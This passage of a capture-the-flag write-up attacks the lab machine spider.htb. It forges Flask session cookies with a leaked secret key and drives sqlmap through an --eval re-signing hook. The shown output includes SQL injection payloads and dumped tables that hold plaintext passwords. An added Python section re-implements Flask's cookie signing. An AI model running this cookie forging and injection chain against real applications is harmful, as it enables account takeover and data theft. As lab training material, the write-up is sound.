# 3 :80 sqlmap via flask cookie

Using <https://book.hacktricks.xyz/pentesting/pentesting-web/flask>

```
$ flask-unsign -d -c 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' -S 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'
$ flask-unsign --decode --cookie 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo'
{'cart_items': []}
```

The last link on that page talks about using sqlmap with the Flask session cookie: <https://book.hacktricks.xyz/pentesting/pentesting-web/flask#sqli-in-flask-session-cookie-with-sqlmap>, which in turn points to the `--eval` section of the sqlmap page.

Using <https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#eval>

```
# Ran it as-is and got errors, then explored and realized it's uuid (not uid).
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dbs

[*] starting @ 17:28:59 /2021-10-06/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[17:29:05] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [INFO] testing connection to the target URL
[17:29:07] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[17:29:13] [INFO] target URL content is stable
[17:29:13] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[17:29:18] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[17:29:19] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[17:29:20] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[17:29:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:29:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:29:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:29:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:29:57] [INFO] testing 'Generic inline queries'
[17:29:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:30:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:30:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:30:29] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:30:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:30:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:31:18] [INFO] target URL appears to be UNION injectable with 1 columns
[17:31:21] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session=' AND (SELECT 6878 FROM (SELECT(SLEEP(5)))Dspl) AND 'xliC'='xliC

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: session=' UNION ALL SELECT CONCAT(0x717a786b71,0x756e616e446a5651496b4662456159494656584b736d77776f554b57787a477867794e4e73644845,0x717a6a6a71)-- -
'
---
[17:31:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[17:31:36] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop
[*] sys

[17:31:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 76 times
[17:31:37] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'

[*] ending @ 17:31:37 /2021-10-06/
---
```
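As an added example (not code from the writeup, sqlmap or flask-unsign), a pure-stdlib re-implementation of how Flask signs and verifies its session cookie; it shows why `flask-unsign` can read the cookie without the key, why the `--eval` hook above has to re-sign every sqlmap payload (an edited cookie without a valid MAC never reaches the query), and why a leaked `SECRET_KEY` removes that protection. The secret is the one from the page, the timestamp 1633564486 is the one decoded from the `YV43Rg` segment of the cookie above, and the `some-other-key` value is a constructed wrong key.

```python
"""Added example (not code from the writeup, sqlmap or flask-unsign): stdlib
re-implementation of Flask's session cookie signing/verification
(itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1)."""
import base64, hashlib, hmac, json, zlib

SALT = b"cookie-session"  # fixed salt Flask uses for session cookies

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _derive_key(secret: str) -> bytes:
    # Flask passes key_derivation="hmac": key = HMAC-SHA1(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()

def sign_session(data: dict, secret: str, ts: int) -> str:
    """payload.timestamp.signature for plain-JSON session data (Flask's
    TaggedJSONSerializer additionally tags tuples, bytes and datetimes)."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)  # itsdangerous compresses when it pays off
    payload = "." + _b64(packed) if len(packed) < len(raw) - 1 else _b64(raw)
    ts_b64 = _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = f"{payload}.{ts_b64}"
    sig = hmac.new(_derive_key(secret), signed.encode(), hashlib.sha1).digest()
    return f"{signed}.{_b64(sig)}"

def verify_session(cookie: str, secret: str):
    """Session dict if the MAC is valid, else None. This check throws away
    any cookie edited without the secret, which is why the sqlmap --eval
    hook above has to re-sign each payload before it reaches the query."""
    try:
        payload, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    except ValueError:
        return None
    msg = f"{payload}.{ts_b64}".encode()
    expected = hmac.new(_derive_key(secret), msg, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _unb64(sig_b64)):
        return None  # tampered or wrong key: Flask starts an empty session
    compressed = payload.startswith(".")
    raw = _unb64(payload[1:] if compressed else payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)

if __name__ == "__main__":
    secret = "Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942"  # from the writeup
    cookie = sign_session({"cart_items": []}, secret, ts=1633564486)
    print(cookie, verify_session(cookie, secret))
    print(verify_session(cookie, "some-other-key"))  # None: wrong key
```

The payload and timestamp segments are plain base64url, which is all `flask-unsign --decode` needs; only the third segment depends on the secret.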

```
# -D shop --tables
[17:32:49] [INFO] fetching tables for database: 'shop'
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
Database: shop
[4 tables]
+----------+
| items    |
| messages |
| support  |
| users    |
+----------+

# -D shop --dump-all
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message                                                                           | timestamp           |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1       | 1       | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+

[17:34:56] [INFO] table 'shop.messages' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/messages.csv'
[17:34:56] [INFO] fetching columns for table 'items' in database 'shop'
[17:34:57] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name        | price | image_path                                        | description                                                             |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 3  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 5  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+

[17:34:58] [INFO] table 'shop.items' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/items.csv'
[17:34:58] [INFO] fetching columns for table 'users' in database 'shop'
[17:34:59] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[9 entries]
+----+--------------------------------------+------------+--------------------------------------+
| id | uuid                                 | name       | password                             |
+----+--------------------------------------+------------+--------------------------------------+
| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv       | ch1VW4sHERE7331                      |
| 2  | 39643204-192c-4bb8-88d2-61dc81de7510 | kashz      | kashz                                |
| 3  | <blank>                              | hzx"zxc    | ddb8ef28-a54a-4da1-b734-f5eff7af2c0f | #"
| 4  | a7e52b68-53d2-4cf2-b072-6aff45d7d31c | ${7*7}     | kashz                                |
| 5  | bb731ee3-c354-46ea-93ad-ce05d99f1f29 | {{7*7}}    | kashz                                |
| 6  | 4459e9dc-f87d-45c8-a0e2-f4480f4a6398 | {{7*7}}    | kashz                                |
| 7  | d8a9109b-4ff2-46e1-bc85-4e77c2ca0c35 | {{10*10}}  | kashz                                |
| 8  | b3d3c283-26c8-4d4a-b7c0-cf1fc000f7bb | {{7*'7'}}  | KASHZ                                |
| 9  | 4480d8e5-eda9-4053-be22-e807f716a45a | {{config}} | kashz                                |
+----+--------------------------------------+------------+--------------------------------------+

[17:35:00] [INFO] table 'shop.users' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/users.csv'
[17:35:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[17:35:00] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'

[*] ending @ 17:35:00 /2021-10-06/
```
